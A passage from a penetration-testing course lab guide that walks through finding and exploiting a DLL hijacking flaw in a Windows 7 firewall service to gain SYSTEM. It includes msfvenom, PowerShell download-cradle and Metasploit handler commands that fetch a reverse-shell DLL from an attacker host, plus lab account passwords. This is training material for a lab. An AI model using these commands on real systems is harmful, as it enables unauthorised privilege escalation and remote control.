© 2018 Caendra Inc.

| Hera for PTPv5 | Post-Exploitation 1

Your objective for this scenario is to conduct manual analysis using Process Monitor and
Process Explorer on a Windows 7 machine as a local administrator in order to discover an
application which may be vulnerable to DLL Hijacking.

Once the vulnerability has been identified as the administrator user, log onto the same
system as a low-privileged user and exploit the DLL Hijacking vulnerability to escalate
privileges to SYSTEM.

• Conduct manual research of a Windows 7 operating system and identify a DLL

Hijacking vulnerability that can lead to privilege escalation.
• Use the identified DLL Hijacking vulnerability to escalate your privileges to SYSTEM
from a low privileged user account.

• Process Explorer
• Process Monitor
• PowerShell
• Metasploit

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 2

Using the Administrator credentials below, Remote Desktop to the Windows 7 machine,
and conduct manual analysis of the system using Process Explorer and Process Monitor in
order to identify a DLL Hijacking Vulnerability that can lead to privilege escalation.

IP: 172.16.48.100

Username: student_admin

Password: s7udent_n1md@

Using the information obtained through manual analysis of the system as the administrator
user, use the Low Privileged user credentials below to remote desktop to the system,
exploit a DLL Hijacking vulnerability and escalate your privileges to SYSTEM.

IP: 172.16.48.100

Username: lowpriv

Password: c00l_passw0rd!

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 3

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 4
Below, you can find solutions for each task for the Network Security, Post Exploitation –
DLL Hijacking tasks. Remember though, that you can follow your own strategy (which may
be different from the one explained in the following lab).

From our tester machine, which is a Kali Rolling install, we Remote Desktop the Lab System
as the administrator user:

Username: student_admin

Password: s7udent_n1md@

# rdesktop 172.16.48.100

Once connected, we can launch the Process Explorer application from the shortcut on the
Desktop. We right-click on the shortcut, and select “Run as Administrator.”

Once in Process Explorer, we identify a particular process we’re interested in, running as
NT AUTHORITY\SYSTEM, the “outpost.exe” process, which through some research, we find
is associated to a third-party firewall application.

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 5

Double-Clicking on the process, we take note of the directory where the application is
installed:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 6

We also confirm that the process has an associated service, by navigating to the “Services”
tab for our “outpost.exe” process in question:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 7

In viewing the permissions for the service, by clicking on the “Permissions” button on the
same Services tab screen, we also notice that the “Users” group, has full control over the
service:

Furthermore, if we explore the permissions of the software’s program directory, we also

can see that users in the “Users” group have the ability to modify contents of this folder. We
take note of all of these facts, as they will be important once we identify an opportunity for
DLL Hijacking.

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 8

Next, we can launch Process Monitor, as administrator, same as we did with the Process
Explorer application.

Once in the Process Monitor, we modify the current filter by clicking on the small filter
button in the top menu, or by clicking CTRL+L, where we’re presented with the Process
Monitor Filter dialog:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 9

From here, we select “Process Name” from the first drop-down:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 10

We then enter “outpost.exe” in the text field, and click on the “Add” button:

We also add a filter for the “Result” column, and supply a value of “NAME NOT FOUND” in
the text field:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 11

We can also further refine our filter; we create a filter where “Path” contains the string
“dll.” This will help us pinpoint DLL’s that the application is loading:

We click “Add,” and then the “OK” button to apply our selections.

The procmon window may be blank at this point.

Next, we want to kill the “outpost.exe” process which has the NT AUTHORITY\SYSTEM
privileges. We can kill the outpost.exe SYSTEM process from Process Explorer by right-
clicking, and selecting the “Kill Process” option, making sure you’re killing the correct
outpost.exe process that is running as SYSTEM.

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 12

We then need to start the OutpostFirewall service. This, we do from an administrator
command prompt. From the start menu, type “cmd,” right click on “Cmd” and select “Run
As Administrator.”

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 13

Then, restart the OutpostFirewall service with the following command:

C:\windows\system32\> net start OutpostFirewall

Once we start the service, we’ll notice in Process Monitor, that we’ve captured some events
that might be useful to us for the purpose of DLL Hijacking:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 14

Important: Make sure that the DLL we choose to hijack is one that is searched for by the
process with NT AUTHORITY\SYSTEM privileges as seen above. In the above screenshot,
we can see two that we could use for our DLL Hijack. “UxTheme.dll” or “imageres.dll.”

For this example, we’ll choose the “UxTheme.dll” file for our candidate to execute a DLL
Hijack exploit.

At this point, we’ve identified that the service is looking for several DLL’s in a directory
which we can write too as a low-privileged user in the “Users” group.

Our next step is to log in to the system as the low privileged user, plant our chosen DLL
(UxTheme.dll), and ultimately get a SYSTEM shell on the target.

Having conducted some analysis on a vulnerable application and having identified an

application which may be vulnerable to DLL Hijacking, we can next log into the system as
our low privileged user, and continue with the task.

Username: lowpriv

Password: c00l_passw0rd!

# rdesktop 172.16.48.100

The first thing we need to do is create a payload we can use our “malicious” “UxTheme.dll”
file.

On our attacker machine, we use msfvenom to generate a 32-bit meterpreter reverse_https

DLL payload (the outpost.exe application is 32-bit).

# msfvenom -p windows/meterpreter/reverse_https LHOST=<attacker IP>

LPORT=4444 -f dll > UxTheme.dll

We need a way to get this payload down to our target system, so on the attacker machine,
we first run a python HTTPServer to host our payload from the directory which contains
our “malicious” DLL file. We’ll run the server on port 80:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 15

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Then, from the target system, we launch a command prompt and execute a powershell
download cradle to download our payload into the application directory:

C:\Users\lowpriv> powershell -c iex (New-Object

Net.WebClient).DownloadFile(‘http://<attacker_IP>/UxTheme.dll’, ‘C:\Program
Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll’)

We can then confirm our DLL has been download into the applications’ program directory:

C:\users\lowpriv> dir “C:\Program Files (x86)\Agnitum\Outpost Firewall

1.0\UxTheme.dll”

Now that our rogue DLL is in place, next we need to prepare a listener on our attacker
machine to handle the connection once we restart the Outpost Firewall application on the
target.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.16.48.10
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started HTTPS reverse handler on https://172.16.48.10:4444

Now that we have our handler ready, we need to restart the machine, so when the service
starts, it will load our “rogue” “UxTheme.dll,” and we should at that point get a meterpreter
session from the target back to the attacker machine as SYSTEM.

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 16

We can reboot the system from the Remote Desktop session with the following command
from a command prompt:

C:\Users\lowpriv> shutdown /r /t 0

When the system comes back, it may take several minutes with this particular
application for the system to fully power up, and the all necessary services to start, but
we should end up with a SYSTEM-level meterpreter session after some time:

© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation 17